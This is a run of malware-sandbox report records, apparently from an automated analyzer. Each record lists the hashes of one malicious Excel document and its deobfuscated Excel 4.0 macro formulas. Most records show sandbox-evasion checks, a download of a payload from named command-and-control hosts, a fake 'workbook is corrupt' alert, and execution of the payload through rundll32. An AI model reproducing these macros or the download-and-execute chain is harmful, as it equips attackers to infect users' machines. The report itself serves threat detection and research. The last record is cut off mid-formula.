{"version":"0.2","sample":{"sample":"","kind":"file","target":"3e74f2961400cf1e27ccf559c28bb7fbd3ca67ed117d0948311258312b6af628"},"analysis":{"reported":"2020-04-09T16:15:55Z","score":10},"files":[{"filename":"3e74f2961400cf1e27ccf559c28bb7fbd3ca67ed117d0948311258312b6af628","filesize":168960,"md5":"49f21618ee21c3398dd6a50db6fcbb17","sha1":"d70a1844d98e4398c7f937d160d16ec095e885fe","sha256":"3e74f2961400cf1e27ccf559c28bb7fbd3ca67ed117d0948311258312b6af628","sha512":"b969c26f87318da27d7975f847142794dac0e272dd8a163739b5d99a7d3ebd0aee521b1a72504de2cd2ca3384fca7ea313d1f4591801251c5533ed23cfca03a3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3e74f2961400cf1e27ccf559c28bb7fbd3ca67ed117d0948311258312b6af628.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"tsJp3bdhJq\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3e84c3f1ad39c82381967dacb1ee4989cd728dafd44dda06792ee65b07e72efb"},"analysis":{"reported":"2020-04-09T16:15:55Z","score":10},"files":[{"filename":"3e84c3f1ad39c82381967dacb1ee4989cd728dafd44dda06792ee65b07e72efb","filesize":160768,"md5":"d3a74aa0b3d2e7fef8266b62e9bb2fab","sha1":"10b76be76e398b04722a36ced55c8218675774cf","sha256":"3e84c3f1ad39c82381967dacb1ee4989cd728dafd44dda06792ee65b07e72efb","sha512":"1e82dad00f6e1aa491e3cd9e265b3251d73d34051c3a6bf62efcef553e01f0a4e0f8036d16cc5f79751318385b3470d22a396b9ae81949afe230b3d111e504d6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3e84c3f1ad39c82381967dacb1ee4989cd728dafd44dda06792ee65b07e72efb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Aq48qpNwCk\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3e9499158ffc5285681a0ecfea10630b014b09758f621dd595d48975798e9d97"},"analysis":{"reported":"2020-04-09T16:15:55Z","score":10},"files":[{"filename":"3e9499158ffc5285681a0ecfea10630b014b09758f621dd595d48975798e9d97","filesize":221184,"md5":"37d0a6a0054a6ea55b43868d73d03351","sha1":"8e20b411ed20024d65c43988f67e6f28889a9be8","sha256":"3e9499158ffc5285681a0ecfea10630b014b09758f621dd595d48975798e9d97","sha512":"2dc18e4eadae6aaff4f0bc7d66722805642e973ce6ab9386b34d58934c04cd4806b92d4bcaccff0c3bb07a98024bc4cb1fef04aabaadedb916974c4eeb8072db","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3e9499158ffc5285681a0ecfea10630b014b09758f621dd595d48975798e9d97.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"EBamHQv2I9\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3e9d3144823a08f22a70c3b8580cdb97adf533a2a5c7c101e5cd81cf15f55cb2"},"analysis":{"reported":"2020-04-09T16:15:55Z","score":10},"files":[{"filename":"3e9d3144823a08f22a70c3b8580cdb97adf533a2a5c7c101e5cd81cf15f55cb2","filesize":142848,"md5":"750ce4cf69f3cd3e42dc1fc4bd8319de","sha1":"5a901a6e3c3df3401fc0a4cb6b6ae57341418213","sha256":"3e9d3144823a08f22a70c3b8580cdb97adf533a2a5c7c101e5cd81cf15f55cb2","sha512":"f9498f657d153757cc55b458a0d0d21ceac02f1305cd8ae8c05a030a20756da265e2f9c30ce31939aa330146b1391d9c94ea8fbdc8d8676905a07d943e10ff46","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3e9d3144823a08f22a70c3b8580cdb97adf533a2a5c7c101e5cd81cf15f55cb2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"4KhHVAwlO1\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3eafe0ebc6c101832f3f0998793929ada208a60b537d33d01115959cb51f402c"},"analysis":{"reported":"2020-04-09T16:15:55Z","score":10},"files":[{"filename":"3eafe0ebc6c101832f3f0998793929ada208a60b537d33d01115959cb51f402c","filesize":160768,"md5":"cdb9743b0b67556a526fa93ef0565a41","sha1":"d0d1c406a74de429ad87bfae4e9677d136fa9783","sha256":"3eafe0ebc6c101832f3f0998793929ada208a60b537d33d01115959cb51f402c","sha512":"80e39c5f09170cec49bdd8c45037f8df66f7ab38a6f0b3803f315e36253c3411e60bd0c5e27afc322bbfa34f673bf76018fda7fbee2b0aa4152dc765417efc23","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3eafe0ebc6c101832f3f0998793929ada208a60b537d33d01115959cb51f402c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"SctI1o6l9B\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3eb1bb22fa0d1b721e7a26a08304af793f1b917395ac2b17e5f52d5f9300c63e"},"analysis":{"reported":"2020-04-09T16:15:55Z","score":10},"files":[{"filename":"3eb1bb22fa0d1b721e7a26a08304af793f1b917395ac2b17e5f52d5f9300c63e","filesize":104448,"md5":"44846a1cc54b268a6c72aae7ccd69957","sha1":"336873ebb0d76df79551faa7ef534aa90c5ea91f","sha256":"3eb1bb22fa0d1b721e7a26a08304af793f1b917395ac2b17e5f52d5f9300c63e","sha512":"638e651064c4d70c36d310b8044225837d5c1966d2c712c08d6aebb272cea1a920bce5adb6b43aadfd809c02b510b32a91aaf8fadec1041ec3597e82e4c1deff","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3eb1bb22fa0d1b721e7a26a08304af793f1b917395ac2b17e5f52d5f9300c63e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"Vm6WYjR00m\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3eb4a5fdb0e1adfa1b8462f651e0dd9ca78ba3abaa59623d0df4886dfc4434f2"},"analysis":{"reported":"2020-04-09T16:15:55Z","score":10},"files":[{"filename":"3eb4a5fdb0e1adfa1b8462f651e0dd9ca78ba3abaa59623d0df4886dfc4434f2","filesize":116224,"md5":"a7a55f2506675d60deb0130cf492ea8f","sha1":"4362fd8a1508e97a02ab5d9cc14ec0f136d8e761","sha256":"3eb4a5fdb0e1adfa1b8462f651e0dd9ca78ba3abaa59623d0df4886dfc4434f2","sha512":"d7a53ff76ecb0cef78ec59e67f6822b29af76d9466369411dbe3cd2fa611695262f8c04d3e51bcdc4838c28b670a3818aea28fffb7caa81e3f924a28703b4982","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3eb4a5fdb0e1adfa1b8462f651e0dd9ca78ba3abaa59623d0df4886dfc4434f2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"IYPt7bragH\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3eb59ea4870866ed44bc13eb8e56d85cf0e01a95acd8d73d1d075e97488dd535"},"analysis":{"reported":"2020-04-09T16:15:55Z","score":10},"files":[{"filename":"3eb59ea4870866ed44bc13eb8e56d85cf0e01a95acd8d73d1d075e97488dd535","filesize":116224,"md5":"19394c99d7542e03224b481c855627d2","sha1":"3fe76961875989a47e4a4cf51846879078646f37","sha256":"3eb59ea4870866ed44bc13eb8e56d85cf0e01a95acd8d73d1d075e97488dd535","sha512":"1fb641c9ab16f11d63718d661c777cf31efddbd6a11d2947b08fdc8f0f31414f05d4284e8dbcda94f0ec50445632337cbb2aa36cc0984e2db10911bdb268d7ab","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3eb59ea4870866ed44bc13eb8e56d85cf0e01a95acd8d73d1d075e97488dd535.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qvwOykgYLQ\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3eba5cbe3c064eb0f933a36c53d03869431f3cca87b28eb70c550f6f36e4ba5d"},"analysis":{"reported":"2020-04-09T16:15:55Z","score":10},"files":[{"filename":"3eba5cbe3c064eb0f933a36c53d03869431f3cca87b28eb70c550f6f36e4ba5d","filesize":204800,"md5":"df6f322fed54d871ffffba7667202bea","sha1":"4624b715f964d6f85993d9865fe4b8984d5c9ae8","sha256":"3eba5cbe3c064eb0f933a36c53d03869431f3cca87b28eb70c550f6f36e4ba5d","sha512":"659075639f51e14d2ce7791a96e89a929429a1841be0c6fd1b68f9a417d3e60ce4581634d5eb72d39f79ac74739ba638d33b41544aeb58cbd5286295c4a451fb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3eba5cbe3c064eb0f933a36c53d03869431f3cca87b28eb70c550f6f36e4ba5d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,HALT())\nIF(GET.WORKSPACE(42),,HALT())\nFOPEN(\"C:\\Users\\Public\\1.vbs\",3)\nMESSAGE(TRUE,\"One moment please...\")\nIF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),EXEC(GET.NOTE(R$34C$3)),)\nIF(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2),EXEC(GET.NOTE(R$36C$3)),)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3f06ec0fcfaaa136046211f723a7d7bbc1679427b520a94c2f65156e17cca21b"},"analysis":{"reported":"2020-04-09T16:15:55Z","score":10},"files":[{"filename":"3f06ec0fcfaaa136046211f723a7d7bbc1679427b520a94c2f65156e17cca21b","filesize":206336,"md5":"f360b341af145d4614cd7cf980c9d25d","sha1":"df28b0c352ee384ca6b05d39c09b77a19042fb77","sha256":"3f06ec0fcfaaa136046211f723a7d7bbc1679427b520a94c2f65156e17cca21b","sha512":"4d6e04273cf471551d8641d9fef715d0cdff8fd96898e96b397fb28fb0f3e1b4f90f1fb7c0bf261103b2b262240c93d199a4ad4c6f56adfecc806c8360a3f6cc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3f06ec0fcfaaa136046211f723a7d7bbc1679427b520a94c2f65156e17cca21b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"pkjBSb2EC6\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3f0a1aeccb90ff288bdb9da7eb31fbb344c3e44a3a7c717589f1a274de41bc1e"},"analysis":{"reported":"2020-04-09T16:15:55Z","score":10},"files":[{"filename":"3f0a1aeccb90ff288bdb9da7eb31fbb344c3e44a3a7c717589f1a274de41bc1e","filesize":168448,"md5":"144bdcc656205912b00eed9018315936","sha1":"89cdef9718d19b676c843478cac026d68a1163be","sha256":"3f0a1aeccb90ff288bdb9da7eb31fbb344c3e44a3a7c717589f1a274de41bc1e","sha512":"facab3275ade61a26c88c4c8611ffd27664f3f011e3f84104ae2f31ff137461ad079e990538edef5fb5d01e476f378459c8761cbc6e7aa998b62409d9bf74356","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3f0a1aeccb90ff288bdb9da7eb31fbb344c3e44a3a7c717589f1a274de41bc1e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"eCbgX4dvlU\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3f15a67f81717af1c93927248763ebaf5f7334ea5975f2248c163e7411e9491a"},"analysis":{"reported":"2020-04-09T16:15:55Z","score":10},"files":[{"filename":"3f15a67f81717af1c93927248763ebaf5f7334ea5975f2248c163e7411e9491a","filesize":146944,"md5":"fa6e0f42a4372c16acd718944b4548c9","sha1":"7cc7c7eebbc0884ff4cefbf0ee0c92447ba079ac","sha256":"3f15a67f81717af1c93927248763ebaf5f7334ea5975f2248c163e7411e9491a","sha512":"2a21d5ea5568dab353ad47a942e8d00409de43a11776d045db880b812d659757369ad030c7111d2e183fbd118db745513cffea5f723892cfbe7c354858352808","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3f15a67f81717af1c93927248763ebaf5f7334ea5975f2248c163e7411e9491a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"gzFPNMipxi\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3f17e0efb0151b5e960114b5aa81ce94fdf138d1ed5fbbd01b7972eb8b4f7820"},"analysis":{"reported":"2020-04-09T16:15:55Z","score":10},"files":[{"filename":"3f17e0efb0151b5e960114b5aa81ce94fdf138d1ed5fbbd01b7972eb8b4f7820","filesize":160768,"md5":"4d6bf6e509c3103c64a04fb2e7bbee89","sha1":"270600200313b142f708e5dd136c71c7a47a7446","sha256":"3f17e0efb0151b5e960114b5aa81ce94fdf138d1ed5fbbd01b7972eb8b4f7820","sha512":"c81c17ffbec1146a4da2d842137983ab4d2bcde4f1d88a7550dfb938ce9c208406707153e1556261cb77ab34135e839dad8b71e0b4f5f47cf856d114762af9b5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3f17e0efb0151b5e960114b5aa81ce94fdf138d1ed5fbbd01b7972eb8b4f7820.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wCYi9Afopw\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3f3ed041f3591ae80cb886615a771dc3d1982467d5a20a52865429d51cf07b9d"},"analysis":{"reported":"2020-04-09T16:15:55Z","score":10},"files":[{"filename":"3f3ed041f3591ae80cb886615a771dc3d1982467d5a20a52865429d51cf07b9d","filesize":104448,"md5":"dbc41f601478fe1e9c89ae14ab8e8128","sha1":"8cd9c8b43cb82aa29ff8bd81a629f7aad66da3b7","sha256":"3f3ed041f3591ae80cb886615a771dc3d1982467d5a20a52865429d51cf07b9d","sha512":"83cfe0a0e4f0856fca827acd1d444057b19fb0a9cc8531f703ff01e7419370dd383e9c3a0f1879724cee1dabac3a51b07c60cc4f96061b6f941077d3152cfd86","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3f3ed041f3591ae80cb886615a771dc3d1982467d5a20a52865429d51cf07b9d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"BCCuEksRRA\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3f4194ac8be5ccd75629afa0c615f8435256df6645a7fb1608884c123536d18b"},"analysis":{"reported":"2020-04-09T16:15:55Z","score":10},"files":[{"filename":"3f4194ac8be5ccd75629afa0c615f8435256df6645a7fb1608884c123536d18b","filesize":168960,"md5":"d9dca54a42360d01fe3a96782266d9f7","sha1":"d5b90fcb03484f0c61fee7ec7525e1db794689d9","sha256":"3f4194ac8be5ccd75629afa0c615f8435256df6645a7fb1608884c123536d18b","sha512":"dd97a7e681a8cee0eab274bbaf4a90b54e499e4e4f94f7a01d721d13bbae68df91cb0feab76678e9ac519f6bbfcea98b7c75d35494ead62b0f2f4491b80670f8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3f4194ac8be5ccd75629afa0c615f8435256df6645a7fb1608884c123536d18b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), 